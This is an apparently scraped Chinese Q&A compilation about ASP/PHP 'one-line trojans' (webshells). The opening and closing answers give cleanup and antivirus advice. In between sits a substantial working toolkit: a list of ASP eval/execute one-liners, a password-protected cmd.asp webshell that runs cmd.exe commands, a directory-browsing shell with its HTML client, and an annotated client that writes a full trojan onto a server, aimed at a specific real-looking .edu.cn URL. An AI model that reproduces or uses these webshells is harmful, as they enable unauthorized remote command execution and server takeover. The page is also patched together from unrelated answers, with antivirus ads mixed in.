如何去除php一句话木马
vps或者独立服务器安装安全狗(完全免费)虚拟主机文件权限设置为只读。检查代码漏洞
一句话木马
ASP一句话木马大全!
%eval request("MH")%
%execute request("MH")%
%execute(request("MH"))%
%If Request("MH")"" Then Execute(Request("MH"))%
%if request ("MH")""then session("MH")=request("MH"):end if:if session("MH")"" then execute session("MH")%
SCRIPT language=VBScript runat="server"execute request("MH")/SCRIPT
%@ Page Language="Jscript"%
%eval(Request.Item["MH"],"unsafe");%
1 asp一句话木马
一句话木马 服务器端
带验证:
——————————————cmd.asp————————————————
%
if request("authkey")="pic16f873a" then
%
textarea readonly cols=80 rows=25
%response.write server.createobject("wscript.shell").exec("cmd.exe /c "request("cmd")).stdout.readall%
/textarea
%
end if
%
带验证 客户端
——————————————cmd.html————————————————
HTML
HEAD
meta http-equiv="Content-Type" content="text/html; charset=gbk"
/HEAD
div align=center
FORM method=post name=frm target=_blank
Host:input type=text name=act size=65 value="http://"
br
br
Cmd :input type=text name=cmd size=65 value="cmd"
br
br
input type=hidden name=authkey value="pic16f873a"
Input name=Send
onclick="Javascipt:frm.action=document.frm.act.value;
frm.submit();"
type=button value="Send Command"
/FORM
/div
目录浏览
服务器端
_________________________________________
%
if request("authkey")="pic16f873a" then
szPara = Request.Form("path")
set shell=server.createobject("shell.application")
set dir1=shell.namespace(szPara)
set diritems=dir1.items
for each iii in diritems
response.write iii.path "font color=blue[" iii.size "]/fontbr"
next
end if
%
_________________________________________
客户端
__________________________________________
HTML
HEAD
meta http-equiv="Content-Type" content="text/html; charset=gbk"
/HEAD
div align=center
FORM method=post name=frm target=_blank
Host:input type=text name=act size=65 value="http://"
br
br
Path:input type=text name=path size=65 value="C:\"
br
br
input type=hidden name=authkey value="pic16f873a"
Input name=Send onclick="Javascipt:frm.action=document.frm.act.value;frm.submit();"
type=button value="Send Command"
/FORM
/div
一句话木马客户端源文件:
里面涉及到一些脚本知识,我就只讲解一下功能和简单注释,不详细讲了,大家只要注意几个注意点就行了
***********************************************************
form action=http://cjy.xjife.edu.cn/news/ebook/db/ebook.asp method=post
//"action="后面是需要修改的以asp命名的数据库的提交地址
//这个标签的意思是建立一个表单 以post方式提交给连接http://cjy.xjife.edu.cn/news/ebook/db/ebook.asp处理
textarea name=value cols=120 rows=10 width=45
//这里的value值根据服务端%execute request("value")%中value而设定
//可以自行修改成%execute request("p")%相应这里的value值也必须改为p
set lP=server.createObject("Adodb.Stream")//建立流对象,有了对象才可以使用它固有的属性和方法
lP.Open //打开
lP.Type=2 //以文本方式
lP.CharSet="gb2312" //字体标准
lP.writetext request("joeving") //取得木马内容 参数joeving可以自己定义 但必须和下面的name=joeving相对应
lP.SaveToFile server.mappath("wei.asp"),2
//将木马内容以覆盖文件的方式写入wei.asp
//2就是已覆盖的方式,这里的wei.asp也是可以自己定义的,如定义成1.asp
//但和下面的response.redirect"wei.asp"中wei.asp的保持一致
lP.Close //关闭对象
set lP=nothing //释放对象
response.redirect "wei.asp" //转向生成的wei.asp 和上面的wei.asp相对应,也就是你熟悉的asp木马登 陆界面
/textarea
//这段程序的功能:利用插入到数据库文件的%execute request("value")%这段代码执行第一个textarea中的内容,并将添加的木马内容写入和指向wei.asp,这样就相当于在服务器上建立了个asp木马文件,这样就可以取得webshell了
textarea name=joeving cols=120 rows=10 width=45添入生成木马的内容/textareaBRcenterbr
//这段标签是你用来添加木马内容用的
input type=submit value=提交
/form
***********************************************************
//程序的主要框架是
form
textarea/textarea//取得木马内容并用无组件上传技术在服务器端创建asp木马文件并显示
textarea/textarea//添加木马内容用的
/form
其实都是些很简单的一些html和asp的知识,大家不妨自己写个自己的木马客户端~~~呵呵
希望对你能有所帮助。
网站文件里有上千个文件被感染一句话木马,怎么能彻底清除干净
可以用腾讯电脑管家,管家云库,云安全检测中心,拥有全球最大的恶意网站数据库。云智能预警系统,在木马活动早期侦测并阻断木马的破坏行为,通过云查杀技术秒杀最新流行木马。精确打击病毒,瞬时查杀风险。
网站中了一句话木马,木马名称是root.asp。高分求解决方法。跪求了..
这是个把vbs语句当参数传递执行,可能还有其它后门。要么仔细看下所有目录下的每个文件,有没多出文件,要么只保留上传图片和数据库,其它删掉,把本地网站重新上传,
有这个文件存在,证明网站或服务器存在问题,
跟空间服务商联系帮忙检查一下日志,看是自己网站的漏洞还是同一个服务器上其它网站的问题?
看网站里所用在线编辑器是否有问题,默认的密码改掉了么,还有无组件上传类,比如上传组件一般都叫update.asp,改写类中变量函数名成自己的。
跟空间服务商联系,把上传目录的vbs执行权限去掉。
一句话木马有什么样的危害?危害有多大?
愿我的答案 能够解决您的烦忧
这个木马主要是针对建设网站的人的,就是针对你网站漏洞抓住后投放木马就这样
你如果自己不做网站,可以不在乎这个,做网站的话出现这个要及时杀毒
这病毒可能就在你电脑上,直接对蓝本杀毒
1,下载腾讯电脑管家“8.10”最新版,对电脑首先进行一个体检,打开所有防火墙避免系统其余文件被感染。
2,打开杀毒页面开始查杀,切记要打开小红伞引擎。如果普通查杀不能解决问题,您可以打开腾讯电脑管家---杀毒——全盘杀毒- 进行深度扫描。
3,查杀处理完所有病毒后,立刻重启电脑,再进行一次安全体检,清除多余系统缓存文件,避免二次感染。
如果您对我的答案不满意,可以继续追问或者提出宝贵意见,谢谢